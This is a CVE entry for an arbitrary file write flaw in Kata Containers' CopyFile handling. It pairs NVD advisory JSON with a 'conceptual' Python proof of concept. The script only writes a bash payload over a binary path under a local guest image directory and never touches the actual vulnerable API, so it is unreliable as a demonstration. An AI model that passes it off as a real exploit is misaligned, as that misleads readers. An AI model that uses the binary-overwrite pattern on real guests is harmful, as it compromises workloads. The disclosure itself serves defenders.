CVE-2026-41326

# Conceptual Proof of Concept for CVE-2026-41326 # This script demonstrates the arbitrary file write vulnerability in Kata Containers. # An attacker can use the CopyFile handler to write to any path inside the guest. import os def exploit_cve_2026_41326(guest_image_path, malicious_content, destination_path): """ Simulates exploiting the CopyFile oversight to write arbitrary files. Args: guest_image_path: Path to the target guest workload image. malicious_content: Content to write into the guest. destination_path: Arbitrary path inside the guest (e.g., /bin/sh). """ print(f"[*] Targeting Guest Image: {guest_image_path}") print(f"[*] Attempting to write to: {destination_path}") # In a real scenario, this would invoke the vulnerable 'kata-runtime' or relevant agent API # The vulnerability stems from the lack of path validation in the CopyFile policy. # Simulated vulnerability trigger try: # Vulnerable operation: Copying file without validating 'destination_path' with open(guest_image_path + destination_path, 'wb') as f: f.write(malicious_content.encode()) print(f"[+] Success: Written to {destination_path}") print(f"[+] Payload: {malicious_content}") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": # Example usage: Overwriting a critical binary inside the guest target_guest = "/var/lib/kata-containers/containers/test_vm/" payload = "#!/bin/bash\necho 'System Compromised'" arbitrary_dest = "/usr/bin/critical-app" # Arbitrary location exploit_cve_2026_41326(target_guest, payload, arbitrary_dest)

{"cve": {"id": "CVE-2026-41326", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:12.253", "lastModified": "2026-05-14T16:33:30.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kata Containers is an open source project focusing on a standard implementation of lightweight Virtual Machines (VMs) that perform like containers. From v3.4.0 to v3.28.0, an oversight in the CopyFile policy (and perhaps the CopyFile handler) allows untrusted hosts to write to arbitrary locations inside the guest workload image. This can be used to overwrite binaries inside the guest and exfiltrate data from containers; even those running inside CVMs. This vulnerability is fixed in v3.29.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:katacontainers:confidential_containers:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.9.0", "versionEndExcluding": "0.20.0", "matchCriteriaId": "A27C2F2F-55C7-453E-8FB9-CAD52817C0A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:katacontainers:kata_containers:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.29.0", "matchCriteriaId": "BFA002E4-85F7-4597-A52B-097DE4D8ABD0"}]}]}], "references": [{"url": "https://github.com/kata-containers/kata-containers/commit/1b9e49eb2763aa6ea6a99b276d3ff5e2c7f658f2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kata-containers/kata-containers/security/advisories/GHSA-q49m-57vm-c8cc", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/13/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory", "Mailing List"]}, {"url": "https://github.com/kata-containers/kata-containers/security/advisories/GHSA-q49m-57vm-c8cc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}